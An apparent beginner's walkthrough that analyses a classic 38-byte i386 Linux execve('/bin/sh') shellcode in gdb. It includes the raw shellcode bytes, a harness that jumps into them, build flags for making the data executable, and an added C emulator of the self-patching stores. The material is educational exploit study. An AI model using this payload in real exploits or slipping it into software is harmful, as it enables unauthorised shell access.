[root@localhost ceshi]# gdb shellcode
GNU gdb Fedora (6.8-27.el5)
Copyright (C) 2008 Free Software Foundation, Inc.
License GPLv3+: GNU GPL version 3 or later <http://gnu.org/licenses/gpl.html>
This is free software: you are free to change and redistribute it.
There is NO WARRANTY, to the extent permitted by law. Type "show copying"
and "show warranty" for details.
This GDB was configured as "i386-redhat-linux-gnu"...
(gdb) l
1 #include <stdio.h>
2
3 static char shellcode[]=
4 "\xeb\x17\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b\x89"
5 "\xf3\x8d\x4e\x08\x31\xd2\xcd\x80\xe8\xe4\xff\xff\xff\x2f\x62\x69\x6e"
6 "\x2f\x73\x68\x58";
7
8 int main() {
9 (*(void(*)())shellcode)();
10 return 0;
(gdb)
Set a breakpoint on the line that jumps into the shellcode and debug at the instruction level, i.e. display /i $pc so gdb shows the current instruction at every stop. Note that the harness calls straight into the .data array; that only works while the data segment is executable. On a toolchain that links with a non-executable data segment the call faults, and you need to build with an executable stack (gcc -m32 -z execstack, which on 32-bit x86 Linux also makes readable data executable) or copy the bytes into an mmap'd RWX page first.
(gdb) b 9
Breakpoint 1 at 0x8048365: file shellcode.c, line 9.
(gdb) display /i $pc
(gdb) run
Starting program: /root/ceshi/shellcode
Breakpoint 1, main () at shellcode.c:9
9 (*(void(*)())shellcode)();
1: x/i $pc
0x8048365 <main+17>: mov $0x8049580,%eax
(gdb)
The tail of the buffer starts at 2F: the bytes 2F 62 69 6E 2F 73 68 are the string "/bin/sh". As a C string it should end in 00, but the byte stored there is 58 ('X'), not 00, so how does the string get terminated? The shellcode cannot carry a 0x00 byte directly: when it is delivered through a string copy such as strcpy, the copy stops at the first NUL, which is the only reason the rule exists (the harness above calls the array in place and would not care). Stepping through it shows that the instruction mov %al,0x7(%esi) (mov [esi+7], al in Intel syntax) is what turns the 58 into 00 once %eax has been zeroed by xor %eax,%eax, and that completes "/bin/sh". The two neighbouring stores, mov %esi,0x8(%esi) and mov %eax,0xc(%esi), build argv directly behind the string: argv[0] = the address of "/bin/sh" and argv[1] = NULL. With mov %esi,%ebx, lea 0x8(%esi),%ecx, xor %edx,%edx and mov $0xb,%al the registers are then set for execve("/bin/sh", argv, NULL) via int $0x80. One caveat: those two dword stores land 8 bytes past the end of the 38-byte array, so wherever the shellcode is placed it needs writable scratch space right after the string.
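The self-patching above can be checked without executing the bytes. The following C program is an added example, not code from the original post: it keeps the same 38 bytes, confirms they contain no NUL, follows the jmp/call pair statically to find where pop %esi will leave %esi, then emulates the three stores on a copy of the buffer (with 8 bytes of slack) and reports the register and memory state the kernel would see at int $0x80. The base address 0x08049580 is the value gdb loaded into %eax above and is used only as a label; the emulation assumes a little-endian host, as on the target.

```c
#include <stdint.h>
#include <stddef.h>
#include <stdio.h>
#include <string.h>

/* The 38 bytes from the listing above. */
static const unsigned char shellcode[] =
    "\xeb\x17\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b\x89"
    "\xf3\x8d\x4e\x08\x31\xd2\xcd\x80\xe8\xe4\xff\xff\xff\x2f\x62\x69\x6e"
    "\x2f\x73\x68\x58";
#define SC_LEN (sizeof(shellcode) - 1)   /* drop the C string terminator */

/* Assumed load address: the value gdb put in %eax on the page. Only a label here. */
#define SC_BASE 0x08049580u

/* Why the string ends in 'X': a strcpy-style delivery stops at the first NUL. */
int has_null_byte(const unsigned char *p, size_t n)
{
    for (size_t i = 0; i < n; i++)
        if (p[i] == 0) return 1;
    return 0;
}

/* Resolve the jmp/call pair statically. The short jmp lands on a call whose
 * pushed return address is the byte after it, i.e. the start of "/bin/shX";
 * the call must land back on pop %esi (0x5e). Returns the string offset or -1. */
long resolve_string_offset(const unsigned char *p, size_t n)
{
    if (n < 2 || p[0] != 0xeb) return -1;                                   /* jmp rel8 */
    long jmp_target = 2 + (int8_t)p[1];
    if (jmp_target < 0 || jmp_target + 5 > (long)n || p[jmp_target] != 0xe8) /* call rel32 */
        return -1;
    int32_t rel;
    memcpy(&rel, p + jmp_target + 1, sizeof rel);
    long call_target = jmp_target + 5 + rel;
    if (call_target < 0 || call_target >= (long)n || p[call_target] != 0x5e) /* pop %esi */
        return -1;
    return jmp_target + 5;   /* the return address the call pushes = the string */
}

typedef struct {
    uint32_t eax, ebx, ecx, edx;   /* register state at int $0x80 */
    char     path[9];              /* the 8 bytes at %ebx, NUL-padded for printing */
    uint32_t argv0, argv1;         /* the two dwords at %ecx */
} syscall_state;

/* Emulate the three stores between pop %esi and int $0x80 on a copy of the
 * buffer (little-endian host assumed):
 *   mov %esi,0x8(%esi)   argv[0] = address of "/bin/sh"
 *   mov %al,0x7(%esi)    'X' -> NUL, terminating the path
 *   mov %eax,0xc(%esi)   argv[1] = NULL
 * The two dword stores land 8 bytes past the array, so the copy gets slack. */
int emulate_until_syscall(uint32_t base, syscall_state *st)
{
    unsigned char mem[SC_LEN + 8];
    long soff = resolve_string_offset(shellcode, SC_LEN);
    if (soff < 0) return -1;

    memset(mem, 0xaa, sizeof mem);                 /* poison: shows exactly what gets written */
    memcpy(mem, shellcode, SC_LEN);

    uint32_t esi = base + (uint32_t)soff;          /* pop %esi */
    uint32_t eax = 0;                              /* xor %eax,%eax */
    memcpy(mem + (esi + 8 - base), &esi, 4);       /* mov %esi,0x8(%esi) */
    mem[esi + 7 - base] = (unsigned char)eax;      /* mov %al,0x7(%esi) */
    memcpy(mem + (esi + 12 - base), &eax, 4);      /* mov %eax,0xc(%esi) */
    eax = 0x0b;                                    /* mov $0xb,%al: __NR_execve on i386 */

    st->eax = eax;
    st->ebx = esi;                                 /* mov %esi,%ebx */
    st->ecx = esi + 8;                             /* lea 0x8(%esi),%ecx */
    st->edx = 0;                                   /* xor %edx,%edx */
    memcpy(st->path, mem + (st->ebx - base), 8);
    st->path[8] = '\0';
    memcpy(&st->argv0, mem + (st->ecx - base), 4);
    memcpy(&st->argv1, mem + (st->ecx + 4 - base), 4);
    return 0;
}

int main(void)
{
    syscall_state st;
    printf("null bytes in shellcode: %s\n", has_null_byte(shellcode, SC_LEN) ? "yes" : "no");
    printf("string offset: 0x%lx, last byte before patch: 0x%02x ('%c')\n",
           resolve_string_offset(shellcode, SC_LEN), shellcode[SC_LEN - 1], shellcode[SC_LEN - 1]);
    if (emulate_until_syscall(SC_BASE, &st) != 0) return 1;
    printf("int $0x80: eax=%u (execve) ebx=0x%08x -> \"%s\" ecx=0x%08x -> {0x%08x, 0x%08x} edx=0x%x\n",
           st.eax, st.ebx, st.path, st.ecx, st.argv0, st.argv1, st.edx);
    return 0;
}
```

The poison byte 0xaa makes the out-of-array writes visible: after the emulation only bytes 38..45 of the copy have changed, which is the 8 bytes of scratch the shellcode silently depends on. Run the same emulation with a base that differs from the one gdb showed and the path and argv pointers move with it, which is exactly what the jmp/call trick buys: no absolute address anywhere in the bytes.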
That ends the analysis. This is my first time analyzing shellcode and there is a lot I still don't understand, so more study is needed.
Study hard and make progress every day.